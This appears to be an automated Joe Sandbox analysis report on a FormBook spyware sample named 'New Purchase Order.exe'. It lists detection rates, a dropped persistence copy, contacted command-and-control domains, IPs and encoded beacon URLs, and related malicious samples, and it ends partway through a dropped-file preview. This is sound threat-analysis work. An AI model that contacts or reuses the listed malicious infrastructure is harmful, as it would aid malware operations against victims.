            New Purchase Order.exe33%VirustotalBrowse
            New Purchase Order.exe19%ReversingLabs
            New Purchase Order.exe100%AviraHEUR/AGEN.1306097
            New Purchase Order.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\hbaiQWstL.exe100%AviraHEUR/AGEN.1306097
            C:\Users\user\AppData\Roaming\hbaiQWstL.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\hbaiQWstL.exe29%ReversingLabsWin32.Trojan.Generic
            C:\Users\user\AppData\Roaming\hbaiQWstL.exe33%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            nosr.net0%VirustotalBrowse
            angelenterprise.biz1%VirustotalBrowse
            dns.ladipage.com0%VirustotalBrowse
            www.complexity.pub1%VirustotalBrowse
            www.dyme.tech0%VirustotalBrowse
            www.nevsehir-nakliyat.xyz1%VirustotalBrowse
            www.masteriocp.online1%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse
            www.angelenterprise.biz0%VirustotalBrowse
            www.monos.shop0%VirustotalBrowse
            www.nosr.net0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.masteriocp.online/wg84/2%VirustotalBrowse
            http://www.angelenterprise.biz/efkd/0%Avira URL Cloudsafe
            http://www.nevsehir-nakliyat.xyz/csz1/?np=B1/oNyROsiSyJWt29sj2S0IFRvICl+iEjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eGqtyx0Ndpfqa25N0T4jVP+zcs/aWlws8PlhiBv+1+sYYzcOzaf0=&O4s0=7rrhM0%Avira URL Cloudsafe
            http://www.kryto.top/09dt/0%Avira URL Cloudsafe
            http://www.masteriocp.online/wg84/0%Avira URL Cloudsafe
            http://www.complexity.pub/4c7j/0%Avira URL Cloudsafe
            https://www.masteriocp.online/wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDT0%Avira URL Cloudsafe
            http://www.nosr.net/ujbu/?O4s0=7rrhM&np=MTTknThtRCJj0ATwznqj01o1Cri3+JPfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLk94tH9MdVpcC/d4hhj8l3F2/cR0CQHBzLt4ZWoJ62kMu+v5Sa8M=0%Avira URL Cloudsafe
            http://www.nevsehir-nakliyat.xyz/csz1/0%Avira URL Cloudsafe
            http://www.angelenterprise.biz/efkd/?np=IufelbUCTKOeuwMC8EUMZp6RlpEgAJDIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7lhYpBivnSDbaB35/ERUm/0qpp+YY+ZI0WrG4EzYBf/iASgSBweg=&O4s0=7rrhM0%Avira URL Cloudsafe
            http://www.complexity.pub/4c7j/?O4s0=7rrhM&np=hrEH6McWLCF5pgA68gNL2x/WHVd3zz4Lu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW74id0uvrTjdsIz/rLBcjWUYSu3cGevEH/eSJ/+YdconAbopgpETc=0%Avira URL Cloudsafe
            http://www.complexity.pub/4c7j/2%VirustotalBrowse
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://www.nevsehir-nakliyat.xyz/csz1/1%VirustotalBrowse
            http://www.masteriocp.online/wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiJL1tOfgyOKUOFFDpBfdN6WGkZZw760Atp7sDgLoyqrjSo8Yq8vY=&O4s0=7rrhM0%Avira URL Cloudsafe
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=0%Avira URL Cloudsafe
            http://www.angelenterprise.biz0%Avira URL Cloudsafe
            http://www.kryto.top/09dt/?np=rbfG5gS9WKSJFi6SRtlEG1H5qgha+qyBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFY+8px5RXtAkGOTa83eEXxiWZoc8O/jqsRPGTy32XZb2ldw74hvQ=&O4s0=7rrhM0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%VirustotalBrowse
            http://www.angelenterprise.biz0%VirustotalBrowse
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            nosr.net
            		82.221.128.183
            		truetrueunknown
            angelenterprise.biz
            		3.33.130.190
            		truetrueunknown
            dns.ladipage.com
            		13.228.81.39
            		truetrueunknown
            www.complexity.pub
            		217.160.0.127
            		truetrueunknown
            www.dyme.tech
            		13.248.169.48
            		truetrueunknown
            www.kryto.top
            		162.0.213.94
            		truetrue
              		unknown
              natroredirect.natrocdn.com
              		85.159.66.93
              		truetrueunknown
              www.monos.shop
              		unknown
              		unknowntrueunknown
              www.nosr.net
              		unknown
              		unknowntrueunknown
              www.nevsehir-nakliyat.xyz
              		unknown
              		unknowntrueunknown
              www.masteriocp.online
              		unknown
              		unknowntrueunknown
              www.angelenterprise.biz
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.kryto.top/09dt/true
              • Avira URL Cloud: safe
              		unknown
              http://www.masteriocp.online/wg84/true
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.nevsehir-nakliyat.xyz/csz1/?np=B1/oNyROsiSyJWt29sj2S0IFRvICl+iEjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eGqtyx0Ndpfqa25N0T4jVP+zcs/aWlws8PlhiBv+1+sYYzcOzaf0=&O4s0=7rrhMtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.angelenterprise.biz/efkd/true
              • Avira URL Cloud: safe
              		unknown
              http://www.complexity.pub/4c7j/true
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.nosr.net/ujbu/?O4s0=7rrhM&np=MTTknThtRCJj0ATwznqj01o1Cri3+JPfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLk94tH9MdVpcC/d4hhj8l3F2/cR0CQHBzLt4ZWoJ62kMu+v5Sa8M=true
              • Avira URL Cloud: safe
              		unknown
              http://www.nevsehir-nakliyat.xyz/csz1/true
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.angelenterprise.biz/efkd/?np=IufelbUCTKOeuwMC8EUMZp6RlpEgAJDIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7lhYpBivnSDbaB35/ERUm/0qpp+YY+ZI0WrG4EzYBf/iASgSBweg=&O4s0=7rrhMtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.complexity.pub/4c7j/?O4s0=7rrhM&np=hrEH6McWLCF5pgA68gNL2x/WHVd3zz4Lu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW74id0uvrTjdsIz/rLBcjWUYSu3cGevEH/eSJ/+YdconAbopgpETc=true
              • Avira URL Cloud: safe
              		unknown
              http://www.masteriocp.online/wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiJL1tOfgyOKUOFFDpBfdN6WGkZZw760Atp7sDgLoyqrjSo8Yq8vY=&O4s0=7rrhMtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.kryto.top/09dt/?np=rbfG5gS9WKSJFi6SRtlEG1H5qgha+qyBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFY+8px5RXtAkGOTa83eEXxiWZoc8O/jqsRPGTy32XZb2ldw74hvQ=&O4s0=7rrhMtrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://ac.ecosia.org/autocomplete?q=setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://duckduckgo.com/chrome_newtabsetupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://duckduckgo.com/ac/?q=setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsetupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://www.masteriocp.online/wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDTsetupugc.exe, 00000011.00000002.3379647495.000000000468C000.00000004.10000000.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3379292512.000000000335C000.00000004.00000001.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csssetupugc.exe, 00000011.00000002.3379647495.000000000481E000.00000004.10000000.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3379292512.00000000034EE000.00000004.00000001.00040000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=setupugc.exe, 00000011.00000002.3379647495.0000000004044000.00000004.10000000.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3379292512.0000000002D14000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2689415276.0000000039C64000.00000004.80000000.00040000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.angelenterprise.bizSguBfrlSDIFxPr.exe, 00000014.00000002.3381064714.0000000004DB3000.00000040.80000000.00040000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.ecosia.org/newtab/setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNew Purchase Order.exe, 00000000.00000002.2165111682.0000000002EED000.00000004.00000800.00020000.00000000.sdmp, hbaiQWstL.exe, 0000000A.00000002.2312499541.000000000351D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              162.0.213.94
              		www.kryto.topCanada
              		35893ACPCAtrue
              82.221.128.183
              		nosr.netIceland
              		50613THORDC-ASIStrue
              217.160.0.127
              		www.complexity.pubGermany
              		8560ONEANDONE-ASBrauerstrasse48DEtrue
              13.228.81.39
              		dns.ladipage.comUnited States
              		16509AMAZON-02UStrue
              85.159.66.93
              		natroredirect.natrocdn.comTurkey
              		34619CIZGITRtrue
              3.33.130.190
              		angelenterprise.bizUnited States
              		8987AMAZONEXPANSIONGBtrue

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1512971
              Start date and time:2024-09-18 09:01:07 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 10m 11s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:24
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:2
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:New Purchase Order.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@23/16@8/6
              EGA Information:
              • Successful, ratio: 83.3%
              HCA Information:
              • Successful, ratio: 93%
              • Number of executed functions: 124
              • Number of non-executed functions: 311
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              03:01:57API Interceptor1x Sleep call for process: New Purchase Order.exe modified
              03:01:59API Interceptor32x Sleep call for process: powershell.exe modified
              03:02:03API Interceptor1x Sleep call for process: hbaiQWstL.exe modified
              03:03:00API Interceptor2441707x Sleep call for process: setupugc.exe modified
              09:02:00Task SchedulerRun new task: hbaiQWstL path: C:\Users\user\AppData\Roaming\hbaiQWstL.exe

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              162.0.213.94invoice.exeGet hashmaliciousFormBookBrowse
              • www.syvra.xyz/h2bb/
              r9856_7.exeGet hashmaliciousFormBookBrowse
              • www.zimra.xyz/knrh/
              PO#86637.exeGet hashmaliciousFormBookBrowse
              • www.syvra.xyz/h2bb/
              New Purchase Order.exeGet hashmaliciousFormBookBrowse
              • www.kryto.top/09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr
              Scan 00093847.exeGet hashmaliciousFormBookBrowse
              • www.kryto.top/09dt/
              Quote #011698.exeGet hashmaliciousFormBookBrowse
              • www.syvra.xyz/h2bb/
              PO#86637.exeGet hashmaliciousFormBookBrowse
              • www.syvra.xyz/h2bb/
              PO#86637.exeGet hashmaliciousFormBookBrowse
              • www.syvra.xyz/h2bb/
              0XLuA614VK.exeGet hashmaliciousFormBookBrowse
              • www.rigintech.info/ig9u/
              RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exeGet hashmaliciousFormBookBrowse
              • www.zyfro.info/hnng/
              82.221.128.183New Purchase Order.exeGet hashmaliciousFormBookBrowse
              • www.nosr.net/ujbu/?lt=MTTknThtRCJj0AT/2nqFymBldeCJp6XfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLl6MWH88cVp441dEYiiIl3QDYLx1FQH1mC88=&3ry=nj20Xr
              Facturas_Pagadas_al_Vencimiento.PDF.exeGet hashmaliciousFormBookBrowse
              • www.secure-clients-page.com/kbov/?ybbYU=lIAaItybSDBgNkcb&xXQ-=WEDk22hUkMefI4h+KOuvD7SFNVkSBOjZ9ow7zFWwR5ytm66LlPqoMBwBmzvxbX8tg1rDdnHradXEOWkZgCuoxSccrvBk7Fqcyg==
              presupuesto_PDF.exeGet hashmaliciousFormBookBrowse
              • www.secure-clients-page.com/kbov/?Ix4CZrj=WEDk22hUkMefI4h+KOuvD7SFNVkSBOjZ9ow7zFWwR5ytm66LlPqoMBwBmzvxbX8tg1rDdnHradXEOWkZgCuoxSccrvBk7Fqcyg==&5Q=ig4viG0aegUg0XIH
              217.160.0.127New Purchase Order.exeGet hashmaliciousFormBookBrowse
              • www.complexity.pub/4c7j/?3ry=nj20Xr&lt=hrEH6McWLCF5pgA15gNtwiWGYg9JkAgLu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW75lpPuubSjdIy5/XyCdXWUNnJg8HZvEzqXDM=
              Scan 00093847.exeGet hashmaliciousFormBookBrowse
              • www.complexity.pub/4c7j/
              TF1--90.AE.473- ARCA.exeGet hashmaliciousFormBookBrowse
              • www.complexity.pub/1a9l/
              PJS-4021339 IND.exeGet hashmaliciousFormBookBrowse
              • www.complexity.pub/1a9l/?sjxt=xcJry0nATrgPz3s36D+DOY5ekYU8biyZdas4OE33gPLDnSNbS35En5uwC9LoXFyiXOn0vEVdDXXLnDr8V4+Innl6LQCNpnI4Om4T44/YbFCKR+QJ9w==&af0Ll=b83H
              REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • www.complexity.pub/4c7j/
              Tender_24910.exeGet hashmaliciousFormBookBrowse
              • www.complexity.pub/1a9l/
              Atlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
              • www.complexity.pub/1a9l/
              SecuriteInfo.com.Trojan.AutoIt.1430.6102.4229.exeGet hashmaliciousFormBookBrowse
              • www.complexity.pub/1a9l/
              item que precis#U00e1vamos.exeGet hashmaliciousFormBookBrowse
              • www.xn--adlerbergrsse-rmb8f.com/gn27/?y6td9N=AV0xlbNpYPfX7490&5jMt_6W=/xQadSu05KLJmftF0h54nQl5Tyx1RcUtgeaGInW1KJq4GFMJERUTzU13IZ77P2vqUMWj
              boleto de pagamento.exeGet hashmaliciousFormBookBrowse
              • www.xn--adlerbergrsse-rmb8f.com/gn27/?v6=gJBP9Jq0ihlD00_p&R48x=/xQadSu05KLJmftF0h54nQl5Tyx1RcUtgeaGInW1KJq4GFMJERUTzU13IZ7RQGfqQOej

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              www.dyme.techNew Purchase Order.exeGet hashmaliciousFormBookBrowse
              • 13.248.169.48
              Scan 00093847.exeGet hashmaliciousFormBookBrowse
              • 13.248.169.48
              doc330391202408011.exeGet hashmaliciousFormBookBrowse
              • 13.248.169.48
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • 13.248.169.48
              REQST_PRC 410240665_2024.exeGet hashmaliciousFormBookBrowse
              • 13.248.169.48
              REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
              • 13.248.169.48
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • 13.248.169.48
              REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 13.248.169.48
              INVG0088 LHV3495264 BL327291535V.exeGet hashmaliciousFormBookBrowse
              • 13.248.169.48
              DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
              • 13.248.169.48
              www.complexity.pubNew Purchase Order.exeGet hashmaliciousFormBookBrowse
              • 217.160.0.127
              Scan 00093847.exeGet hashmaliciousFormBookBrowse
              • 217.160.0.127
              TF1--90.AE.473- ARCA.exeGet hashmaliciousFormBookBrowse
              • 217.160.0.127
              PJS-4021339 IND.exeGet hashmaliciousFormBookBrowse
              • 217.160.0.127
              REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 217.160.0.127
              Tender_24910.exeGet hashmaliciousFormBookBrowse
              • 217.160.0.127
              Atlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
              • 217.160.0.127
              SecuriteInfo.com.Trojan.AutoIt.1430.6102.4229.exeGet hashmaliciousFormBookBrowse
              • 217.160.0.127
              dns.ladipage.comShipping report#Cargo Handling.exeGet hashmaliciousFormBookBrowse
              • 13.228.81.39
              PO76389.exeGet hashmaliciousFormBookBrowse
              • 13.228.81.39
              SHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
              • 18.139.62.226
              r3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
              • 13.228.81.39
              SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
              • 13.228.81.39
              3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
              • 18.139.62.226
              New Purchase Order.exeGet hashmaliciousFormBookBrowse
              • 54.179.173.60
              Scan 00093847.exeGet hashmaliciousFormBookBrowse
              • 18.139.62.226
              z11SOAAUG2408.exeGet hashmaliciousFormBookBrowse
              • 13.228.81.39
              REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 13.228.81.39

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              AMAZON-02UShttps://havannahboathouse.com/Get hashmaliciousUnknownBrowse
              • 13.33.187.70
              good.elfGet hashmaliciousUnknownBrowse
              • 54.171.230.55
              https://securcomau.gurucan.com/66e8e67dd77b5900129b4800Get hashmaliciousUnknownBrowse
              • 18.244.18.37
              https://securcomau.gurucan.com/66e8e67dd77b5900129b4800Get hashmaliciousHTMLPhisherBrowse
              • 44.236.63.210
              https://ubenuziqwvnbxsldhlsslykrxxvcdkulinktml.s3.us-west-1.amazonaws.com/vretyyddkfkfkfkf.htmlGet hashmaliciousHTMLPhisherBrowse
              • 52.219.220.218
              https://www-documentsfiles-filled.s3.us-west-1.amazonaws.com/refrrence890345/settlements/QUFNa0FEQmxZMlE1TnpnMExUQTROV1l0TkRVM1lTMWlPR0V6TFdNeFlXWmtPVFEyWWpWaFlRQkdBQUFBQUFBbEl1MDJGRFVUUTZZV2hVeEtkUFIwQndEd2c3Q1hKNkVLUXJxSEZKR/indexx.htmlGet hashmaliciousUnknownBrowse
              • 52.219.116.177
              https://829027.showcasespark.co/?ownid=nlx.fhz_468424&enparms2=9989%2C2099703%2C3941548%2C9940%2C10395%2C465939%2C10150%2C0%2C0%2C9944%2C0%2C2096498%2C829027%2C222081%2C116635312759%2C196039392%2Cnlx.fhz&u_agnt=a565ccc5e7018c4ec7bec64e38db2966&skter=bgrhivermf%20vmroml%2Chfhz%20fhz%2Collsxh%2Bvmroml%2Cmlrgzxfwv%2Bvmroml%2Cbgrhivermf%2Bvmroml&czero=-1&cstate=hzcvg&skwdb=MLI&ccntry=HF&cctid=109&chsh=217b8667beee6c353eae913709720626&rn=304033711370&cf=8&dlt=0&da=353807&pbi=0&cq=-1&exids=&frdto=829027Get hashmaliciousUnknownBrowse
              • 13.32.99.105
              http://glydesolar.comGet hashmaliciousUnknownBrowse
              • 76.76.21.98
              https://meetmsklogi.webflow.io/Get hashmaliciousHTMLPhisherBrowse
              • 18.245.246.158
              https://metamaskksloggiinn.webflow.io/Get hashmaliciousUnknownBrowse
              • 52.222.232.47
              THORDC-ASISNew Purchase Order.exeGet hashmaliciousFormBookBrowse
              • 82.221.128.183
              Scan 00093847.exeGet hashmaliciousFormBookBrowse
              • 82.221.128.183
              REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 82.221.128.183
              botx.x86.elfGet hashmaliciousMiraiBrowse
              • 82.221.214.240
              waybill_shipping_documents_original_BL_CI&PL_29_07_2024_000000002024_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
              • 192.253.251.227
              msi.dll.dllGet hashmaliciousUnknownBrowse
              • 82.221.129.24
              4Y26u3rWN6.rtfGet hashmaliciousGuLoader, RemcosBrowse
              • 192.253.251.227
              waybill_shipping_documents_original_BL_CI&PL_29_07_2024_00000000_doc.xlsGet hashmaliciousRemcosBrowse
              • 192.253.251.227
              createdthingstobefrankwithmeeverywhere.gIF.vbsGet hashmaliciousGuLoader, RemcosBrowse
              • 192.253.251.227
              17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
              • 192.253.251.227
              ACPCAinvoice.exeGet hashmaliciousFormBookBrowse
              • 162.0.213.94
              809768765454654.exeGet hashmaliciousFormBookBrowse
              • 162.0.213.72
              is homemade pepper spray legal uk 42639.jsGet hashmaliciousGookitLoaderBrowse
              • 162.55.208.83
              r9856_7.exeGet hashmaliciousFormBookBrowse
              • 162.0.213.94
              8097600987765.exeGet hashmaliciousFormBookBrowse
              • 162.0.213.72
              PO#86637.exeGet hashmaliciousFormBookBrowse
              • 162.0.213.94
              QOaboeP8al.exeGet hashmaliciousDarkCloudBrowse
              • 162.55.60.2
              Request for Quotataion.exeGet hashmaliciousDarkCloudBrowse
              • 162.55.60.2
              New Purchase Order.exeGet hashmaliciousFormBookBrowse
              • 162.0.213.94
              Scan 00093847.exeGet hashmaliciousFormBookBrowse
              • 162.0.213.94
              ONEANDONE-ASBrauerstrasse48DEPetronas request for-quotation.exeGet hashmaliciousFormBookBrowse
              • 74.208.236.183
              https://www.waigroup.com.au/Get hashmaliciousUnknownBrowse
              • 74.208.236.252
              http://infofunctionboard.autos/Get hashmaliciousUnknownBrowse
              • 212.227.67.33
              https://digitalentreprise.fr/Get hashmaliciousUnknownBrowse
              • 217.160.0.18
              https://redir.digitalentreprise.fr/c/119/7758047/12090/0/618830313/240782/415830/509330dacc.htmlGet hashmaliciousUnknownBrowse
              • 217.160.0.18
              is homemade pepper spray legal uk 42639.jsGet hashmaliciousGookitLoaderBrowse
              • 217.160.0.67
              New Purchase Order.exeGet hashmaliciousFormBookBrowse
              • 217.160.0.231
              Purchase order.exeGet hashmaliciousFormBookBrowse
              • 217.76.156.252
              Rechnung_2024-09-03_100148163067_V21648588.htmlGet hashmaliciousUnknownBrowse
              • 213.165.66.58
              mlnZfOifRX.elfGet hashmaliciousOkiruBrowse
              • 82.223.232.182

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Purchase Order.exe.log

              Download File
              Process:C:\Users\user\Desktop\New Purchase Order.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1216
              Entropy (8bit):5.34331486778365
              Encrypted:false
              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
              MD5:1330C80CAAC9A0FB172F202485E9B1E8
              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
              Malicious:true
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, 